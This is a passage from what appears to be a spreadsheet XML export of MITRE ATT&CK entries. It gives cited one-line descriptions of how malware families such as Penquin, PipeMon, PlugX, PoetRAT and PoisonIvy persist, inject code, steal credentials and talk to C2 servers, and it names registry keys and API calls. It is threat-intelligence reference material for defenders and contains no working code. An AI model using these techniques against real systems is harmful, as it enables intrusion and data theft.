    <t>[Penquin](https://attack.mitre.org/software/S0587) can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use Cron to create periodic and pre-scheduled background jobs.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_upload&lt;/code&gt; to send files to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can delete downloaded executables after running them.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use the command code &lt;code&gt;do_vslist&lt;/code&gt; to send file names, size, and status to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can remove strings from binaries.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_download&lt;/code&gt; to retrieve remote files from C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can add the executable flag to a downloaded file.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has mimicked the Cron binary to hide itself on compromised systems.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can sniff network traffic to look for packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>The [Penquin](https://attack.mitre.org/software/S0587) C2 mechanism is based on TCP and UDP packets.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has encrypted strings in the binary for obfuscation.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the file system type and disk space of a compromised host to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the IP of the compromised host to attacker controlled infrastructure.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used a malicious shim database to maintain persistence.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has encrypted stolen credit card information with AES and further encoded it with Base64.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used the NtQueueApcThread syscall to inject code into svchost.exe.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has collected credit card data using native API functions.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has been decompressed by included shellcode prior to being launched.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has deleted the filepath &lt;code&gt;%APPDATA%\Intel\devmonsrv.exe&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) can uninstall the malicious service from an infected machine.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has stored its malicious payload in the registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used multiple native Windows APIs to execute and conduct process injections.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has been compressed and stored within a registry key. [Pillowmint](https://attack.mitre.org/software/S0517) has also obfuscated the AES key used for encryption.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used a PowerShell script to install a shim database.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) can iterate through running processes every six seconds collecting a list of processes to capture from later.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used shellcode which reads code stored in the registry keys &lt;code&gt;\REGISTRY\SOFTWARE\Microsoft\DRM&lt;/code&gt; using the native Windows API as well as read &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces&lt;/code&gt; as part of its C2.(Citation: Trustwave Pillowmint June 2020)</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</si>
  <si>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The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.(Citation: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</si>
  <si>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with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) collects user files from the compromised host based on predefined file extensions.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) searches for files created within a certain timeframe and whose file extension matches a predefined list.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) gathers system configuration information.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) transfers files from the compromised host via HTTP or HTTPS to a C2 server.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) can be used to identify remote systems within a network.(Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) installer can use UAC bypass techniques to install the payload.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501), its installer, and tools are signed with stolen code-signing certificates.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can attempt to gain administrative privileges using token impersonation.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can decrypt password-protected executables.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can inject its modules into various processes using reflective DLL loading.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can switch to an alternate C2 domain when a particular date has been reached.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can install additional modules via C2 commands.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has stored its encrypted payload in the Registry.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501)'s first stage has been executed by a call to &lt;code&gt;CreateProcess&lt;/code&gt; with the decryption password in an argument. [PipeMon](https://attack.mitre.org/software/S0501) has used a call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) communication module can use a custom protocol based on TLS over TCP.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored encrypted on disk.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can use parent PID spoofing to elevate privileges.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) installer has modified the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors&lt;/code&gt; to install [PipeMon](https://attack.mitre.org/software/S0501) as a Print Processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can iterate over the running processes to find a suitable injection target.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can check for the presence of ESET and Kaspersky security software.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has used call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer. [PipeMon](https://attack.mitre.org/software/S0501) loads its modules using reflective loading or custom shellcode.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) communications are RC4 encrypted.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send OS version and computer name as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can send time zone information from a compromised host to C2.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses DNS as its C2 protocol.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has commands to list drives on the victim machine and to list file information for a given directory.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to upload a file to the victim machine.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) establishes persistence via a Registry Run key.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>Responses from the [Pisloader](https://attack.mitre.org/software/S0124) C2 server are base32-encoded.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect victim system information, including the system name and OS version.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect the victim's IP address.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has used DLL side-loading to evade anti-virus.(Citation: FireEye Clandestine Fox Part 2)(Citation: Dell TG-3390)(Citation: Stewart 2014)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use DNS for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) uses Pastebin to store C2 addresses.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate drives and find files recursively.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to download and execute files on the compromised machine.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for capturing keystrokes per process including window titles.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>In one instance, [menuPass](https://attack.mitre.org/groups/G0045) added [PlugX](https://attack.mitre.org/software/S0013) as a service with a display name of "Corel Writing Tools Utility."(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to create, delete, or modify Registry keys.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use the Windows API function CreateProcess to execute another process.(Citation: Lastline PlugX Analysis)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate network shares.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use raw TCP or UDP for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to list the processes running on a machine.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can enumerate and query for information contained within the Windows Registry.(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) adds Run key entries in the Registry to establish persistence.(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows the operator to capture screenshots.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) checks if VMware tools is running in the background by searching for any process named "vmtoolsd". (Citation: Unit42 PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for enumerating TCP and UDP network connections and associated processes using the &lt;code&gt;netstat&lt;/code&gt; command.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use HTTP for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows actors to spawn a reverse shell on a victim.(Citation: Dell TG-3390)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be added as a service to establish persistence. [PlugX](https://attack.mitre.org/software/S0013) also has a module to change service configurations as well as start, control, and delete services.(Citation: CIRCL PlugX March 2013)(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has executed a Lua script through a Lua interpreter for Windows.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used LZMA and base64 libraries to decode obfuscated scripts.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has exfiltrated data over the C2 channel.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used [FTP](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used FTP for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list files upon receiving the &lt;code&gt;ls&lt;/code&gt; command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used spearphishing attachments to infect victims.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list all running processes.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has added a registry key in the &lt;RUN&gt; hive for persistence.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of "License.txt" and exiting.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to gather information about the compromised host.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a "who" command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used HTTP and HTTPs for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has called cmd through a Word document macro.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>Active Setup</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry key in the Active Setup pointing to a malicious executable.(Citation: Microsoft PoisonIvy 2017)(Citation: paloalto Tropic Trooper 2016)(Citation: FireEye Regsvr32 Targeting Mongolian Gov)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) captures window titles.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can steal system information.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) can inject a malicious DLL into a process.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) contains a keylogger.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) stages collected data in a text file.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new system device.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) hides any strings related to its own indicators of compromise.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates run key Registry entries pointing to a malicious executable dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) uses the Camellia cipher to encrypt communications.(Citation: FireEye Poison Ivy)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can open a command-line interface.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new service. [PoisonIvy](https://attack.mitre.org/software/S0012) also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use Twitter, Reddit, Imgur and other websites to get a C2 URL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use a custom algorithm to decrypt strings used by the malware.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can retrieve payloads from the C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can write encrypted JSON configuration files to the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use &lt;code&gt;LoadLibraryW&lt;/code&gt; and &lt;code&gt;CreateProcess&lt;/code&gt; to load and execute code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can custom encrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use steganography to hide C2 information in images.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) has has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) can download additional files onto the infected system.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used the &lt;code&gt;NetUserEnum&lt;/code&gt; function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) attachments have been delivered via compressed archive files. [Pony](https://attack.mitre.org/software/S0453) also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has collected the Service Pack, language, and region information to send to the C2.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has used batch scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-TokenManipulation for manipulating tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for compressing data using ZIP.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
